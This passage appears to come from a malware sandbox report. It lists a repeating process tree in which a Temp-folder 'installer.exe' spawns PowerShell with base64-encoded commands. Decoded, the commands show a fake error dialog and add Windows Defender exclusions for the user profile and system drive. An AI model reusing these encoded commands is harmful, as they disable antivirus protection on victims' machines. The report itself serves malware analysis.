        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        68⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        68⤵
        
        PID:6712
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        68⤵
        
        PID:2396
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        69⤵
        
        PID:4552
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        69⤵
        
        PID:5496
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        69⤵
        
        PID:4860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        70⤵
        
        PID:4520
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        70⤵
        System Location Discovery: System Language Discovery
        
        PID:1932
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        70⤵
        
        PID:5128
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        71⤵
        
        PID:7052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        71⤵
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        71⤵
        
        PID:7108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        72⤵
        
        PID:7164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        72⤵
        
        PID:5560
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        72⤵
        
        PID:7008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        73⤵
        System Location Discovery: System Language Discovery
        
        PID:5808
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        73⤵
        System Location Discovery: System Language Discovery
        
        PID:300
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        73⤵
        
        PID:3476
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        74⤵
        
        PID:5508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        74⤵
        
        PID:7112
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        74⤵
        
        PID:6680
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        75⤵
        
        PID:5092
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        75⤵
        
        PID:6668
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        75⤵
        
        PID:3168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        76⤵
        
        PID:4948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        76⤵
        
        PID:6664
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        76⤵
        
        PID:6692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        77⤵
        
        PID:4512
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        77⤵
        
        PID:4028
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        77⤵
        
        PID:2652
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        78⤵
        System Location Discovery: System Language Discovery
        
        PID:5564
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        78⤵
        
        PID:6624
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        78⤵
        
        PID:7040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        79⤵
        
        PID:6548
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        79⤵
        
        PID:4784
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        79⤵
        
        PID:4508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        80⤵
        System Location Discovery: System Language Discovery
        
        PID:6056
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        80⤵
        System Location Discovery: System Language Discovery
        
        PID:6636
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        80⤵
        
        PID:5652
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        81⤵
        
        PID:2320
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        81⤵
        
        PID:5848
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        81⤵
        
        PID:5832
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        82⤵
        
        PID:5128
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        82⤵
        
        PID:7000
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        82⤵
        System Location Discovery: System Language Discovery
        
        PID:6172
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        83⤵
        
        PID:5580
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
